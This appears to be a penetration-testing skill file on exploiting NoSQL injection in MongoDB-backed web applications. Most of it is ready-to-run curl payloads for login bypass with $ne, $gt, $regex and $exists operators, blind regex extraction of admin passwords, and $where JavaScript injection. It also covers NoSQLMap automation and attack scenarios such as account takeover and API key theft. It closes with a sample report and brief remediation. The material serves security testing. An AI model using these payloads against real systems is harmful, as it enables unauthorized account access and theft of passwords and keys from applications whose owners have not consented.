--- name: exploiting-nosql-injection-vulnerabilities description: Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks. domain: cybersecurity subdomain: web-application-security tags: - nosql-injection - mongodb - authentication-bypass - injection-attack - web-security - database-security - api-testing version: '1.0' author: mahipal license: Apache-2.0 nist_csf: - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 --- # Exploiting NoSQL Injection Vulnerabilities ## When to Use - During web application penetration testing of applications using NoSQL databases - When testing authentication mechanisms backed by MongoDB or similar databases - When assessing APIs that accept JSON input for database queries - During bug bounty hunting on applications with NoSQL backends - When performing security code review of database query construction ## Prerequisites - Burp Suite Professional or Community Edition with JSON support - NoSQLMap tool installed (`pip install nosqlmap` or from GitHub) - Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists) - Target application using a NoSQL database (MongoDB, CouchDB, Cassandra) - Proxy configured for HTTP traffic interception - Python 3.x for custom payload scripting ## Workflow ### Step 1 — Identify NoSQL Injection Points ```bash # Look for JSON-based login forms or API endpoints # Common indicators: application accepts JSON POST bodies, uses MongoDB # Test with basic syntax-breaking characters curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin\"", "password": "test"}' # Test for operator injection in query parameters curl "http://target.com/api/users?username[$ne]=invalid" # Check for error-based detection curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"query": {"$gt": ""}}' ``` ### Step 2 — Perform Authentication Bypass ```bash # Basic authentication bypass with $ne operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}' # Bypass with $gt operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}' # Target specific user with regex curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": ".*"}}' # Bypass using $exists operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$exists": true}, "password": {"$exists": true}}' ``` ### Step 3 — Extract Data Using Boolean-Based Blind Injection ```bash # Extract username character by character using $regex # Test if first character of admin password is 'a' curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": "^a"}}' # Test if first two characters are 'ab' curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": "^ab"}}' # Enumerate usernames with regex curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}' ``` ### Step 4 — Exploit JavaScript Injection via $where ```bash # JavaScript injection through $where operator curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "this.username == \"admin\""}' # Time-based detection with sleep curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "sleep(5000) || this.username == \"admin\""}' # Data exfiltration via $where with string comparison curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "this.password.match(/^a/) != null"}' ``` ### Step 5 — Use NoSQLMap for Automated Testing ```bash # Clone and setup NoSQLMap git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap python setup.py install # Run NoSQLMap against target python nosqlmap.py -u http://target.com/api/login \ --method POST \ --data '{"username":"test","password":"test"}' # Alternative: use nosqli scanner pip install nosqli nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}' ``` ### Step 6 — Test URL Parameter Injection ```bash # Parameter-based injection (GET requests) curl "http://target.com/api/users?username[$ne]=&password[$ne]=" curl "http://target.com/api/users?username[$regex]=admin&password[$gt]=" curl "http://target.com/api/users?username[$exists]=true" # Array injection via URL parameters curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root" # Inject via HTTP headers if processed by backend curl http://target.com/api/profile \ -H "X-User-Id: {'\$ne': null}" ``` ## Key Concepts | Concept | Description | |---------|-------------| | Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters | | Authentication Bypass | Using operators to match any document and bypass login checks | | Blind Extraction | Character-by-character data extraction using $regex boolean responses | | $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator | | Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) | | BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol | | Server-Side JS | JavaScript execution context available in MongoDB for query evaluation | ## Tools & Systems | Tool | Purpose | |------|---------| | NoSQLMap | Automated NoSQL injection detection and exploitation framework | | Burp Suite | HTTP proxy for intercepting and modifying JSON requests | | MongoDB Shell | Direct database interaction for testing query behavior | | nosqli | Dedicated NoSQL injection scanner and exploitation tool | | PayloadsAllTheThings | Curated NoSQL injection payload repository | | Nuclei | Template-based scanner with NoSQL injection detection templates | | Postman | API testing platform for crafting NoSQL injection requests | ## Common Scenarios 1. **Login Bypass** — Bypass MongoDB-backed authentication using `{"$ne": ""}` operator injection in username and password fields 2. **Data Enumeration** — Extract database contents character by character using `$regex` blind injection when no direct output is visible 3. **Privilege Escalation** — Modify user role fields through NoSQL injection in profile update endpoints 4. **API Key Extraction** — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques 5. **Account Takeover** — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass ## Output Format ``` ## NoSQL Injection Assessment Report - **Target**: http://target.com/api/login - **Database**: MongoDB 6.0 - **Vulnerability Type**: Operator Injection (Authentication Bypass) - **Severity**: Critical (CVSS 9.8) ### Vulnerable Parameters | Endpoint | Parameter | Injection Type | Impact | |----------|-----------|---------------|--------| | POST /api/login | username | Operator ($ne) | Auth Bypass | | POST /api/login | password | Regex ($regex) | Data Extraction | | GET /api/users | id | $where JS Injection | RCE Potential | ### Proof of Concept - Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}} - Extracted 3 admin passwords via blind regex injection - JavaScript execution confirmed via $where operator ### Remediation - Use parameterized queries with MongoDB driver sanitization - Implement input type validation (reject objects where strings expected) - Disable server-side JavaScript execution ($where) in MongoDB config - Apply least-privilege database access controls ```